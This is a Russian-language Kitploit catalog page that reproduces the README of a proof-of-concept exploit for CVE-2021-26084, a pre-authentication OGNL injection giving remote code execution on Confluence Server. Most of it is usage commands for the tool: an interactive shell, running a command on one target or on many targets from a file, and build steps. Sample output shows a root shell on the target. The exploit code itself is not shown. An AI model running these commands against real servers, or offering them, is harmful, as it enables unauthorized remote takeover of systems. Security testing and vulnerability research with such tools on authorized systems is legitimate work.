Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/taythebot/cve-2021-26084
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеИнструмент Удаленного Доступа
GitHubtaythebot/cve-2021-26084

CVE-2021-26084

CVE-2021-26084 — инъекция OGNL в Confluence Server Webwork (Pre-Auth RCE)

Репозиторий
865 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2021-26084

Доказательство концепции для CVE-2021-26084.

Confluence Server Webwork OGNL инъекция (Pre-Auth RCE)

Disclaimer

Это только для образовательных целей. Я не несу ответственности за ваши действия. Используйте на свой страх и риск.

Command Limitations

Из-за полезной нагрузки невозможно передать некоторые символы. Ниже приведён список того, что я обнаружил в ходе тестирования.

  • Двойные кавычки "
  • Вертикальная черта |

Интерактивная оболочка

root@kitploit:~
 go run exploit.go -t <target> -i

Пример

root@kitploit:~
root@localhost:/# go run exploit.go -t http://localhost:8090 -i
CVE-2021-26084 - Confluence Server Webwork OGNL injection
Made by Tay (https://github.com/taythebot)
time="2021-09-02T00:29:37+09:00" level=info msg="Checking if https://localhost:8090 is vulnerable"
time="2021-09-02T00:29:39+09:00" level=info msg="Target https://localhost:8090 is vulnerable"
root@confluence:/# whoami
root
root@confluence:/# exit
Exiting interactive mode, goodbye
  • Работает только с одной целью
  • Введите exit, чтобы выйти из интерактивной оболочки
  • Уведомление показывает, если возможно, машина Windows

Одиночная цель

root@kitploit:~
go run exploit.go -t <target> -c <command>

Несколько целей

root@kitploit:~
go run exploit.go -f <file> -c <command>

Сборка

root@kitploit:~
go mod download
go build exploit.go
Скачать инструмент